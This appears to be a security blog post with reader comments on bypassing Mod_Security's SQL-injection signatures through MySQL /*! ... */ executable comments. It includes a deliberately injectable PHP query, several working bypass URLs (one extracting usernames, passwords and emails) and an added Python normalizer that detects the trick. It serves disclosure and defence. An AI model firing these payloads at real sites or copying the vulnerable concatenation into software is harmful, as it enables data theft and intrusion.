MySQL servers allow one to use comments of the following type:
/*!sql-code*/ and /*!12345sql-code*/
In both cases the SQL code inside the comment is executed! The latter form means that "sql-code" is executed only if the DBMS version is later than the given value.
As I have repeatedly pointed out [1,2], some WAFs skip comments during signature matching. Among such WAFs is the latest stable build of Mod_Security (v. 2.5.9).
Here is a simple example (the query is deliberately built by string concatenation, so the id parameter is injectable):
...
// Vulnerable on purpose: the untrusted GET parameter is concatenated straight into the SQL text.
$query = "SELECT name FROM table where id = ".$_GET['id'];
$result = mysql_query($query);
...
If a web application is protected with Mod_Security, then the following request will be forbidden:
/?id=1+union+select+1
It is remarkable that even these requests (which are incorrect for the considered example) are also blocked by the WAF (HPP/HPF techniques):
/?id=1+union/*&id=*/select+table_name+from+information_schema.columns
/?id=1+union/*&blabla1=*/select+table_name&blabla2=from+information_schema.columns

But if we use the described method with comments, Mod_Security allows our requests and we can exploit the SQL injection:
/?id=1/*!limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/
/?id=1/*!12345limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/
/?id=1/*!limit+0+union+select+concat_ws(0x3a,username,password,email)+from+users*/
Well, one more method for our arsenal :-)
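The following Python is an added example, not code from the post or from Mod_Security. It shows the defender's side of the trick above: a request normalizer that treats the body of /*! ... */ and /*!12345 ... */ comments as executable SQL (because MySQL does), while dropping ordinary /* ... */ comments, and then runs a small signature check. The two-entry signature list and the benign request are constructed for this example; the other sample requests are the post's own payloads. Running the check once in "skip every comment" mode and once with the normalizer shows which requests a comment-skipping signature search misses.

```python
import re
from urllib.parse import unquote_plus

# MySQL executable-comment forms described in the post:
# /*!sql-code*/ and /*!12345sql-code*/ (an optional five-digit version code).
VERSION_COMMENT = re.compile(r"/\*!(?:\d{5})?(.*?)\*/", re.S)
# Ordinary /* ... */ comments, which the DBMS really does ignore.
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Constructed minimal signature set; a real WAF rule set is far larger.
SIGNATURES = [
    re.compile(r"\bunion\b.*?\bselect\b", re.S),
    re.compile(r"\binformation_schema\b"),
]


def normalize(query_string, keep_version_comment_body=True):
    """Return the query string roughly as MySQL will see it.

    With keep_version_comment_body=True the delimiters (and version code) of
    /*! ... */ comments are removed and their SQL body is kept; plain comments
    are dropped either way. With False, every comment is dropped, which is what
    a WAF that "skips comments during signature search" effectively does.
    """
    text = unquote_plus(query_string)          # '+' and %xx decoding
    if keep_version_comment_body:
        text = VERSION_COMMENT.sub(lambda m: " " + m.group(1) + " ", text)
    text = PLAIN_COMMENT.sub(" ", text)
    return re.sub(r"\s+", " ", text).strip().lower()


def matches_signature(query_string, keep_version_comment_body=True):
    """True if any signature hits the normalized query string."""
    text = normalize(query_string, keep_version_comment_body)
    return any(sig.search(text) for sig in SIGNATURES)


# Sample requests: the post's payloads plus one constructed benign request.
SAMPLES = {
    "benign": "id=1",
    "plain_union": "id=1+union+select+1",
    "hpp": "id=1+union/*&id=*/select+table_name+from+information_schema.columns",
    "version_comment": "id=1/*!limit+0+union+select+concat_ws(0x3a,table_name,column_name)"
                       "+from+information_schema.columns*/",
    "versioned": "id=1/*!12345limit+0+union+select+concat_ws(0x3a,table_name,column_name)"
                 "+from+information_schema.columns*/",
}


def compare():
    """Return {name: (comment_skipping_verdict, normalized_verdict)} per sample."""
    return {
        name: (matches_signature(q, False), matches_signature(q, True))
        for name, q in SAMPLES.items()
    }


if __name__ == "__main__":
    for name, (skipping, normalized) in compare().items():
        print(f"{name:16} skip-comments={skipping!s:5} normalized={normalized}")
```

The order of the two substitutions matters: the version-comment rule must run before the plain-comment rule, otherwise `/\*.*?\*/` swallows the `/*! ... */` block whole and the injected SQL disappears from the text the signatures inspect, which is exactly the failure the post exploits.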
Nice catch. It's easy to defend against, though -- just look for the "/*!" sequence in input.
Additionally, you mention that v2.5.9 is the latest version, but v2.5.10 has been out stable for some time now. But, as Ivan mentioned above, you still need to edit the rules to look for "/*!".
Thanks for the great article and work.
I believe that 2.5.10 rules catch this (CRS v2.0.2). Thanks!